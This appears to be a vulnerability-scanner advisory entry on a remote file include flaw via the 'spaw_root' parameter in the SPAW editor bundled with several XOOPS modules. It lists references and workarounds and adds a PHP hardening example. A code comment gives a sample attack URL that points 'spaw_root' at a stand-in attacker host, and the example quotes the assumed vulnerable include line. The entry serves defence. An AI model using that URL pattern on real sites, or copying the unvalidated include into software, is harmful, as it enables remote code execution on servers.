VID | 210059 |
Severity | 40 |
Port | 80, ... |
Protocol | TCP |
Class | CGI |
Detailed Description |
XOOPS is vulnerable to a remote file include (RFI) vulnerability via the 'spaw_root' parameter. XOOPS is a dynamic, object-oriented, open source portal system written in PHP. Several XOOPS modules bundle the SPAW PHP WYSIWYG editor control; in the affected copies, the 'spaw_control.class.php' script builds the path of the files it includes from the 'spaw_root' variable without validating that value. When PHP's register_globals directive is enabled, a request parameter named 'spaw_root' populates that variable, so a remote attacker who sends a specially crafted URL can make the script include a PHP file from an attacker-controlled host and execute arbitrary PHP code and operating system commands on the affected host. Including a file over HTTP additionally requires PHP's allow_url_fopen (and, on PHP 5.2 and later, allow_url_include) to be enabled; a local file include remains possible without those settings.
* References:
  http://www.xoops.org/modules/news/article.php?storyid=3799
  http://www.frsirt.com/english/advisories/2007/2047
  http://www.frsirt.com/english/advisories/2007/2204
  http://www.frsirt.com/english/advisories/2007/2205
  http://www.frsirt.com/english/advisories/2007/2206
  http://secunia.com/advisories/25522
  http://secunia.com/advisories/25652
  http://secunia.com/advisories/25665
  http://secunia.com/advisories/25667
  http://www.milw0rm.com/exploits/4022
  http://www.milw0rm.com/exploits/4063
  http://www.milw0rm.com/exploits/4069
  http://www.milw0rm.com/exploits/4070
  http://www.milw0rm.com/exploits/4084
* Platforms Affected:
  Planet XOOPS, XOOPS WIWIMOD module version 0.4
  Planet XOOPS, XOOPS TinyContent module versions 1.5 and earlier
  Planet XOOPS, XOOPS Cjay Content WYSIWYG IE module versions 3.0 and earlier
  Planet XOOPS, XOOPS XT-Conteudo module versions 1.52 and earlier
  Planet XOOPS, XOOPS icontent module version 1.0
  Any operating system
  Any version |
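The following is an added example, not code from XOOPS, the SPAW editor or any of the listed modules. The vulnerable include line is an assumed shape reconstructed from the description above (the page does not quote the script), and spaw_safe_root() is a hypothetical helper showing one way to stop a request-supplied 'spaw_root' from reaching an include, independent of whether register_globals is on.

```php
<?php
// Added example (not project code). Assumed shape of the vulnerable
// include in spaw_control.class.php: the editor root comes from
// $spaw_root, and with register_globals=On a request such as
//   /path/spaw_control.class.php?spaw_root=http://attacker.example/
// makes PHP fetch and execute config/spaw_control.config.php from
// that host (if allow_url_fopen / allow_url_include permit it):
//
//   include $spaw_root . 'config/spaw_control.config.php';
//
// Hardened version: derive the root from this file's own location and
// refuse anything that does not resolve to that directory.

declare(strict_types=1);

/**
 * Return the only acceptable SPAW root: the directory this file lives in.
 * If a caller passes a value (for example one copied from the request),
 * it is only accepted when it resolves to that same directory; a URL or
 * any other path raises instead of being handed to include.
 */
function spaw_safe_root(?string $requested = null): string
{
    $root = rtrim(str_replace('\\', '/', realpath(__DIR__)), '/') . '/';
    if ($requested !== null) {
        // realpath() returns false for URLs and non-existent paths.
        $real = realpath($requested);
        if ($real === false
            || rtrim(str_replace('\\', '/', $real), '/') . '/' !== $root) {
            throw new RuntimeException(
                'spaw_root must not be taken from the request: ' . $requested
            );
        }
    }
    return $root;
}

// In the class file, set $spaw_root locally before any include so a
// register_globals-injected value is overwritten rather than used.
$spaw_root = spaw_safe_root();
// include $spaw_root . 'config/spaw_control.config.php';

// Constructed inputs demonstrating the check.
$candidates = [
    'http://attacker.example/',   // remote include attempt: rejected
    '/etc/',                      // local directory: rejected
    __DIR__,                      // the real install directory: accepted
];
foreach ($candidates as $candidate) {
    try {
        echo 'accepted: ' . spaw_safe_root($candidate) . PHP_EOL;
    } catch (RuntimeException $e) {
        echo 'rejected: ' . $e->getMessage() . PHP_EOL;
    }
}
```

Note that register_globals cannot be turned off from within a script with ini_set(); it is a php.ini or per-directory (.htaccess) setting, which is why the code above sets $spaw_root itself rather than relying on the directive.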
Recommendation |
No upgrade or patch available as of June 2014.
As a workaround, disable PHP's register_globals directive (register_globals = Off in php.ini, or php_flag register_globals off in .htaccess where PHP runs as an Apache module) so that request parameters can no longer populate $spaw_root. This blocks the known attack vector but does not correct the unvalidated include itself.
-- OR --
Upgrade to a fixed version of the affected XOOPS module when one becomes available from the following Web sites:
For XOOPS TinyContent module: http://www.chapi.de/category/xoops/
For XOOPS Cjay Content WYSIWYG IE module: http://www.xoops.org/modules/repository/singlefile.php?cid=94&lid=1123
For XOOPS XT-Conteudo module: http://www.xoops.org/modules/repository/singlefile.php?cid=94&lid=1405
For XOOPS icontent module: http://www.xoops.org/modules/news/article.php?storyid=1207 |
Related URL | CVE-2007-3057,CVE-2007-3220,CVE-2007-3221,CVE-2007-3237,CVE-2007-3289 (CVE) |
Related URL | 24302,24470 (SecurityFocus) |
Related URL | 34681,34855,34856,34839,34951 (ISS) |